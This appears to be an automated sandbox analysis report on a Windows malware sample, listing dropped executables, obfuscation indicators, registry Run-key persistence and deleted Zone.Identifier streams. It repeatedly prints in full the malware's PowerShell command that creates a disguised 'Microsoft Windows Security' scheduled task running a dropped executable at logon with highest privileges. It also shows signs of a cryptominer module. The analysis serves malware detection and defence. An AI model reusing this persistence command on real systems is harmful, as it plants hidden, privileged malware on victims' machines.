                          Source: Binary string: wkernel32.pdb source: 2779421088.exe, 00000009.00000003.1604616177.0000000003400000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1604539581.00000000014D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608139891.0000000004FE0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608065635.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wkernelbase.pdb source: 2779421088.exe, 00000009.00000003.1605258537.00000000035A0000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1605094211.0000000003380000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608329177.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608484945.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: ntdll.pdb source: 2779421088.exe, 00000009.00000003.1603556707.0000000003380000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1603764627.0000000003570000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607175100.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607399496.00000000050B0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wntdll.pdbUGP source: 2779421088.exe, 00000009.00000003.1604175260.0000000003380000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1604329235.0000000003520000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607701543.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607877443.0000000005060000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: ntdll.pdbUGP source: 2779421088.exe, 00000009.00000003.1603556707.0000000003380000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1603764627.0000000003570000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607175100.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607399496.00000000050B0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wntdll.pdb source: 2779421088.exe, 00000009.00000003.1604175260.0000000003380000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1604329235.0000000003520000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607701543.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607877443.0000000005060000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wkernel32.pdbUGP source: 2779421088.exe, 00000009.00000003.1604616177.0000000003400000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1604539581.00000000014D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608139891.0000000004FE0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608065635.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wkernelbase.pdbUGP source: 2779421088.exe, 00000009.00000003.1605258537.00000000035A0000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1605094211.0000000003380000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608329177.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608484945.00000000050E0000.00000004.00000001.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Users\user\AppData\Local\Temp\2688734187.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeCode function: 24_2_009EAAAC LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,24_2_009EAAAC
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .zero
                          Source: 78476062.exe.5.drStatic PE information: real checksum: 0x6517 should be: 0x659f
                          Source: 2779421088.exe.8.drStatic PE information: real checksum: 0x0 should be: 0x7bbe8
                          Source: newtpp[1].exe.3.drStatic PE information: real checksum: 0x0 should be: 0x22cb3
                          Source: 896429707.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x22cb3
                          Source: jacrzswcvuml.tmp.29.drStatic PE information: real checksum: 0x0 should be: 0x554c2a
                          Source: sysnldcvmr.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x22cb3
                          Source: f5TWdT5EAc.exeStatic PE information: real checksum: 0x0 should be: 0x7e9fc
                          Source: rh[1].exe.8.drStatic PE information: real checksum: 0x0 should be: 0x7bbe8
                          Source: f5TWdT5EAc.exeStatic PE information: section name: .zero
                          Source: rh[1].exe.8.drStatic PE information: section name: .textbss
                          Source: 2779421088.exe.8.drStatic PE information: section name: .textbss
                          Source: nxmr[1].exe.11.drStatic PE information: section name: .xdata
                          Source: 2688734187.exe.11.drStatic PE information: section name: .xdata
                          Source: winupsecvmgr.exe.18.drStatic PE information: section name: .xdata
                          Source: jacrzswcvuml.tmp.29.drStatic PE information: section name: _RANDOMX
                          Source: jacrzswcvuml.tmp.29.drStatic PE information: section name: _TEXT_CN
                          Source: jacrzswcvuml.tmp.29.drStatic PE information: section name: _TEXT_CN
                          Source: jacrzswcvuml.tmp.29.drStatic PE information: section name: _RDATA
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeCode function: 3_2_002519F1 push ecx; ret 3_2_00251A04
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeCode function: 8_2_005519C1 push ecx; ret 8_2_005519D4
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_3_00F7A0F9 push FFFFFF82h; iretd 9_3_00F7A0FB
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_3_00F7D8A0 push 0000002Eh; iretd 9_3_00F7D8A2
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_3_00F7EE8C push es; iretd 9_3_00F7EE8D
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_3_00F7B86D push ebx; ret 9_3_00F7B864
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_3_00F7A840 push ebp; retf 9_3_00F7A841
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_3_00F7E83C pushad ; ret 9_3_00F7E841
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_3_00F7E80E push eax; iretd 9_3_00F7E81D
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_3_00F7B1DD push eax; ret 9_3_00F7B1DF
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_3_00F7EF92 push 00000038h; iretd 9_3_00F7EF9D
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_3_00F7E586 pushad ; retf 9_3_00F7E599
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_3_00F7EF6E push FFFFFFD2h; retf 9_3_00F7EF91
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_3_00F79F6A push eax; ret 9_3_00F79F75
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_3_00F7B70B push ebx; ret 9_3_00F7B864
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F7A0F9 push FFFFFF82h; iretd 9_2_00F7A0FB
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F7D8A0 push 0000002Eh; iretd 9_2_00F7D8A2
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F7B86D push ebx; ret 9_2_00F7B864
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F7A840 push ebp; retf 9_2_00F7A841
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F7E83C pushad ; ret 9_2_00F7E841
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F7E80E push eax; iretd 9_2_00F7E81D
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F7B1DD push eax; ret 9_2_00F7B1DF
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F78904 push ecx; ret 9_2_00F78917
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F7E586 pushad ; retf 9_2_00F7E599
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F79F6A push eax; ret 9_2_00F79F75
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F7B70B push ebx; ret 9_2_00F7B864
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_3_0274225D push eax; ret 10_3_0274225F
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_3_02746012 push 00000038h; iretd 10_3_0274601D
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_3_02745606 pushad ; retf 10_3_02745619
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_3_027428ED push ebx; ret 10_3_027428E4
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_3_027418C0 push ebp; retf 10_3_027418C1

                          Persistence and Installation Behavior

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeExecutable created and started: C:\Windows\sysnldcvmr.exeJump to behavior
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys
                          Source: C:\Windows\sysnldcvmr.exeFile created: C:\Users\user\AppData\Local\Temp\78476062.exeJump to dropped file
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\pei[1].exeJump to dropped file
                          Source: C:\Windows\sysnldcvmr.exeFile created: C:\Users\user\AppData\Local\Temp\1171111125.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeFile created: C:\Windows\sysnldcvmr.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeFile created: C:\Users\user\AppData\Local\Temp\896429707.exeJump to dropped file
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysJump to dropped file
                          Source: C:\Windows\sysnldcvmr.exeFile created: C:\Users\user\AppData\Local\Temp\1657630034.exeJump to dropped file
                          Source: C:\Windows\sysnldcvmr.exeFile created: C:\Users\user\AppData\Local\Temp\640832494.exeJump to dropped file
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeFile created: C:\Users\user\AppData\Local\Temp\34D7.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\newtpp[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rh[1].exeJump to dropped file
                          Source: C:\Windows\sysnldcvmr.exeFile created: C:\Users\user\AppData\Local\Temp\2910625892.exeJump to dropped file
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeFile created: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeFile created: C:\Users\user\AppData\Local\Temp\2779421088.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\2688734187.exeFile created: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeFile created: C:\Users\user\AppData\Local\Temp\2688734187.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nxmr[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeFile created: C:\Windows\sysnldcvmr.exeJump to dropped file

                          Boot Survival

                          barindex
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JACRZSWCVUML.TMP
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JACRZSWCVUML.TMP
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeFile opened: C:\Users\user\AppData\Local\Temp\34D7.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeFile opened: C:\Users\user\AppData\Local\Temp\896429707.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeFile opened: C:\Users\user\AppData\Local\Temp\896429707.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeFile opened: C:\Windows\sysnldcvmr.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeFile opened: C:\Users\user\AppData\Local\Temp\1171111125.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeFile opened: C:\Users\user\AppData\Local\Temp\78476062.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeFile opened: C:\Users\user\AppData\Local\Temp\640832494.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeFile opened: C:\Users\user\AppData\Local\Temp\1657630034.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\sysnldcvmr.exeFile opened: C:\Users\user\AppData\Local\Temp\2910625892.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeFile opened: C:\Users\user\AppData\Local\Temp\2779421088.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeFile opened: C:\Users\user\AppData\Local\Temp\2688734187.exe:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
